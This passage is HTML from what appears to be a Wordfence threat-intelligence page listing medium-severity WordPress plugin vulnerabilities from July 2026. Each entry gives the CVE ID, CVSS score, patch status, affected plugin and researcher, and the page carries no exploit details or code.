<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2919bbc-c4c2-4b52-90ec-2471218cd7d1" target="_blank" rel="noopener">WooCommerce PayPal Payments &lt;= 3.3.2 &#8211; Unauthenticated Sensitive Information Disclosure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-14073" target="_blank" rel="noopener noreferrer">							CVE-2025-14073						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-paypal-payments" target="_blank" rel="noopener">WooCommerce PayPal Payments</a> <span class="wfvr-software-slug">[woocommerce-paypal-payments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/drew-webber" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dfb3a6a61ca4c3b3c0b1dc68fdb21953.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dfb3a6a61ca4c3b3c0b1dc68fdb21953"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/drew-webber" target="_blank" rel="noopener">Drew Webber (mcdruid)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2919bbc-c4c2-4b52-90ec-2471218cd7d1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc167f44-4b1c-4597-9c9b-61064044bcdb" target="_blank" rel="noopener">WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) &lt; 1.10.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14305" target="_blank" rel="noopener noreferrer">							CVE-2026-14305						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/delicious-recipes" target="_blank" rel="noopener">WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes)</a> <span class="wfvr-software-slug">[delicious-recipes]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc167f44-4b1c-4597-9c9b-61064044bcdb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3cc6aa06-ab2a-4d5c-bbbe-4c19722ccc53" target="_blank" rel="noopener">WPBot &lt;= 8.5.9 &#8211; Missing Authorization to Unauthenticated Email Relay via wpcs_send_email AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16774" target="_blank" rel="noopener noreferrer">							CVE-2026-16774						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3cc6aa06-ab2a-4d5c-bbbe-4c19722ccc53" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5463548c-22bd-4645-a94d-ee8c6a236337" target="_blank" rel="noopener">WPBot &lt;= 8.5.9 &#8211; Unauthenticated Sensitive Information Exposure in &#8216;wpbot_send_email_transcript&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16773" target="_blank" rel="noopener noreferrer">							CVE-2026-16773						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5463548c-22bd-4645-a94d-ee8c6a236337" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bfef0be2-b73d-43f9-a3bc-f61846fa0704" target="_blank" rel="noopener">Xendit Payment &lt;= 7.1.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66473" target="_blank" rel="noopener noreferrer">							CVE-2026-66473						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-xendit-virtual-accounts" target="_blank" rel="noopener">Xendit Payment</a> <span class="wfvr-software-slug">[woo-xendit-virtual-accounts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bfef0be2-b73d-43f9-a3bc-f61846fa0704" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55ba8d6a-df38-4e24-afa4-6f82cb318c6b" target="_blank" rel="noopener">Shortcodify &lt;= 1.4.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;name&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">5.0</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.0 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11598" target="_blank" rel="noopener noreferrer">							CVE-2026-11598						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortcodify" target="_blank" rel="noopener">Shortcodify</a> <span class="wfvr-software-slug">[shortcodify]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaki-zaki" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/336a4835171563e9c198b2d4dee1fa34.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="336a4835171563e9c198b2d4dee1fa34"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaki-zaki" target="_blank" rel="noopener">zakaria</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55ba8d6a-df38-4e24-afa4-6f82cb318c6b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3930614d-1b3a-4ca2-9d17-b2e905330fe9" target="_blank" rel="noopener">Google Review Slider &lt;= 18.4 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66427" target="_blank" rel="noopener noreferrer">							CVE-2026-66427						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-places-review-slider" target="_blank" rel="noopener">WP Google Review Slider</a> <span class="wfvr-software-slug">[wp-google-places-review-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3930614d-1b3a-4ca2-9d17-b2e905330fe9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83455de5-4fb2-4782-8063-646d3daf29e5" target="_blank" rel="noopener">GSheetConnector &lt;= 5.2.1 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;s&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16614" target="_blank" rel="noopener noreferrer">							CVE-2026-16614						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-google-sheets-connector" target="_blank" rel="noopener">GSheetConnector – CF7 Google Sheets Connector &amp; Save CF7 Entries to Database</a> <span class="wfvr-software-slug">[cf7-google-sheets-connector]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83455de5-4fb2-4782-8063-646d3daf29e5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e4cff1c-6a01-4725-9e37-f48b5de16d9b" target="_blank" rel="noopener">Icegram Mailer &lt;= 1.0.12 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;fields&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15951" target="_blank" rel="noopener noreferrer">							CVE-2026-15951						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icegram-mailer" target="_blank" rel="noopener">Icegram Mailer – Reliable Email Deliverability, No-code SMTP Replacement &amp; Email logs</a> <span class="wfvr-software-slug">[icegram-mailer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e4cff1c-6a01-4725-9e37-f48b5de16d9b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ccd1314-b9b9-4f63-820c-2817a4932ee8" target="_blank" rel="noopener">Kirki &lt;= 6.0.13 &#8211; Authenticated (Editor+) Path Traversal to Arbitrary File Write (Zip Slip)</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15601" target="_blank" rel="noopener noreferrer">							CVE-2026-15601						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cuokon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/482f7d5936d2268f1f9cdaa84f3867db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="482f7d5936d2268f1f9cdaa84f3867db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cuokon" target="_blank" rel="noopener">cuokon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ccd1314-b9b9-4f63-820c-2817a4932ee8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb23bc2e-4484-46d5-b46e-5e43e5a1bf12" target="_blank" rel="noopener">Pinpoint Booking System &lt;= 2.9.9.6.9 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;field&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15403" target="_blank" rel="noopener noreferrer">							CVE-2026-15403						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-system" target="_blank" rel="noopener">Pinpoint Booking System – Version 2</a> <span class="wfvr-software-slug">[booking-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb23bc2e-4484-46d5-b46e-5e43e5a1bf12" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bed2ada9-af3d-479e-8ae4-11eaad0b3842" target="_blank" rel="noopener">ShopLentor &lt;= 3.4.5 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;orderby&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16811" target="_blank" rel="noopener noreferrer">							CVE-2026-16811						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons" target="_blank" rel="noopener">ShopLentor – All-in-One WooCommerce Growth &amp; Store Enhancement Plugin</a> <span class="wfvr-software-slug">[woolentor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bed2ada9-af3d-479e-8ae4-11eaad0b3842" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8440c1d-2a02-42b4-8fc5-42e5a107c0af" target="_blank" rel="noopener">SMS Alert &lt;= 3.9.7 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15671" target="_blank" rel="noopener noreferrer">							CVE-2026-15671						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8440c1d-2a02-42b4-8fc5-42e5a107c0af" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bcae549f-6a10-4b0d-a8d1-5dcc83e1f2e5" target="_blank" rel="noopener">SMS Alert &lt;= 3.9.7 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;orderby&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15670" target="_blank" rel="noopener noreferrer">							CVE-2026-15670						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
